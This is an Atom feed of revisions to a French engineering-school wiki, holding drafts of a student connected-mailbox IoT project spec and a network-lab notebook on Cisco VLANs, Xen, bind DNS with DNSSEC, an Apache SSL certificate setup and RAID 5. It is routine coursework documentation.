				<updated>2017-01-03T10:06:04Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Choix techniques : matériel et logiciel */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Choix techniques====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36645</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36645"/>
				<updated>2017-01-03T10:04:25Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Description du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36634</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36634"/>
				<updated>2017-01-03T09:45:26Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Description du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36631</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36631"/>
				<updated>2017-01-03T09:44:47Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Description du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
 - Un qui détectera l'ouverture de la trappe &lt;br /&gt;
 - L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36620</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36620"/>
				<updated>2017-01-03T09:37:56Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Objectif du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36616</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36616"/>
				<updated>2017-01-03T09:35:14Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Contexte */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36610</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36610"/>
				<updated>2017-01-03T09:32:52Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Présentation générale du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36604</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36604"/>
				<updated>2017-01-03T09:30:24Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : Page créée avec « ==Cahier des charges== ===Présentation générale du projet=== ====Contexte====   ====Objectif du projet====   ====Description du projet====  ====Choix techniques : matérie... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
====Choix techniques : matériel et logiciel====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Option_Internet_des_objets_2016/2017&amp;diff=36600</id>
		<title>Option Internet des objets 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Option_Internet_des_objets_2016/2017&amp;diff=36600"/>
				<updated>2017-01-03T09:28:55Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Projets ==&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
Ecrivez vos noms sous le format exact &amp;quot;Prénom Nom&amp;quot;, séparez vos noms par des virgules.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Projet !! Elèves&lt;br /&gt;
|- &lt;br /&gt;
| [[Projet IdO 1 2016/2017|Titre du projet 1]] || Prénom1 Nom1, Prénom2 Nom2, Prénom3 Nom3&lt;br /&gt;
|-&lt;br /&gt;
| [[Gant de Boxe connecté]] || Stéphane MAIA, Romuald LENTIEUL&lt;br /&gt;
|-&lt;br /&gt;
| [[Fleur de clown connectée]] || Thibault Malherbe, Thibault Giordan&lt;br /&gt;
|-&lt;br /&gt;
| [[Boîte aux lettres connectée]] || Loïc Delecroix, Romain Ruet, Julien Joignaux&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35930</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35930"/>
				<updated>2016-12-12T11:19:45Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Création du serveur d'authentification FreeRadius */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
Nous commençons dans un premier temps à créer trois partitions via les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-3 -v&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions notre fichier de configuration de machine virtuelle Ironman.cfg en y ajoutant les trois lignes suivantes dans la partie '''disk''':&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/ironman-1,xvdd,w',&lt;br /&gt;
 'phy:/dev/virtual/ironman-2,xvde,w',&lt;br /&gt;
 'phy:/dev/cirtual/ironman-3,xvdf,w',&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, on relance notre machine virtuelle, puis on y installe le paquet mdadm.&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf &lt;br /&gt;
&lt;br /&gt;
On affiche ensuite la configuration actuelle de /dev/md0:&lt;br /&gt;
&lt;br /&gt;
